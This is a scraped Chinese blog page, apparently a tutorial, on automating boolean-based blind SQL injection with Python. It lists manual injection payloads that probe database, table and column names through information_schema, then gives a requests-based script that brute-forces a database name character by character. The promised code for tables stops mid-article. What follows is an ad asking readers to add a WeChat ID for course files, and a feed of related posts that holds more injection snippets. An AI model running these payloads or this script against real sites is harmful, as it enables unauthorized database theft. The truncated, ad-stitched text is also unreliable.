Python自动化sql注入:布尔盲注_布尔盲注脚本,一次关于网络安全的面试经历

已于 2024-04-10 09:23:01 修改
阅读量1k 收藏 17
点赞数 25
分类专栏: 2024年程序员学习 文章标签: python 自动化 sql
于 2024-04-10 09:22:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84182636/article/details/137581563
版权

判断数据库名长度

/?id=1’ and length((select database()))=8–+

挨个判断数据库名

/?id=1’ and ascii(substr((select database()),1,1))=115–+

第一位为’s’

/?id=1’ and ascii(substr((select database()),2,1))=102–+

第二位为’e’

判断表名

/?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102–+

判断字段名

/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=‘表名’ limit 1,1),1,1))=102–+

判断值

/?id=1’ and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1–+

python脚本自动化

可以看到手注需要一个一个试工作量是非常非常巨大的,这时候一个python脚本就可以很好的解放我们的双手:

需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…":

import requests

requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
flag = ‘You are in…’

获取数据库相关信息:

def GetDBName(url):
DBName = ‘’
print(“开始获取数据库名长度…”)
len = 0
for l in range(1,99):
payload = f"’ and length((select database()))={l}–+"
res = conn.get(url=url+payload)
if flag in res.content.decode(“utf-8”):
print(“数据库名长度为:”+str(l))
len = l
break
print(“开始获取数据库名…”)
for i in range(1, len+1):
for j in range(33,127):
payload = f"’ and ascii(substr((select database()),{i},1))={j}–+"
res = conn.get(url=url+payload)
if flag in res.content.decode(“utf-8”):
DBName += chr(j)
print(DBName)
break
return DBName

将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。运行结果如下所示:

接下来就是获取表、字段以及其中的具体数据了,写下去你会发现总体流程都是一样的,以表为例,大致步骤如下:

获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名

代码如下:

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中…(img-NZMRQ6rO-1712712164156)]

2401_84182636
关注
专栏目录
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1308
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 543
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
Sql盲注脚本
最新发布
qq_61740845的博客
08-31 288
【代码】Sql盲注脚本
sql注入python_Python--sql注入
weixin_39702799的博客
12-15 147
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
python番外篇--sql注入
aqovxg590751的博客
04-27 138
一、sql注入概念介绍 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 二、Python中防止...
python脚本实现布尔盲注
求大佬师傅带
04-28 1006
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL注入之基于布尔盲注详解
09-10
在实际操作中,由于手动进行布尔盲注非常耗时,通常会编写自动化脚本来辅助。例如,Python的`requests`库可以用来发送HTTP请求,通过检查响应的长度或内容来判断SQL查询的正确性。这样的脚本会迭代所有可能的字符...
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 584
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
SQL盲注脚本
ma963852的博客
12-14 867
#coding:utf-8 import requests import time ip_port="127.0.0.1:80" data={ "login":"bee", "password":"bug", "security_level":"0", "form":"submit" } urlLogin="http://%s/login.php"%ip_port session=requests.session() resp=session.post(urlLogin,.
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 872
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
pythonsql注入
weixin_30468137的博客
03-16 231
一、什么是sql注入:   SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致...
Python--sql注入
weixin_34236497的博客
02-02 113
import pymysqlconn = pymysql.connect(host='211.149.218.16', user='jxz', password='123456', db='jxz', port=3306, charset='utf8')cur = conn.cursor(cursor=pymysql.cursors.DictCursor)name = 'zdq'sex = 0cu...
SQL盲注脚本(MySQL
卧龙居
11-13 1331
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1281
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
布尔盲注 python
08-28
布尔盲注是一种注入攻击技术,它利用了应用程序对数据库是否返回正确或错误的响应来获取敏感信息。在Python中实现布尔盲注可以通过发送恶意注入字符串并观察响应来判断条件是否为真或为假。 一种常见的方法是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值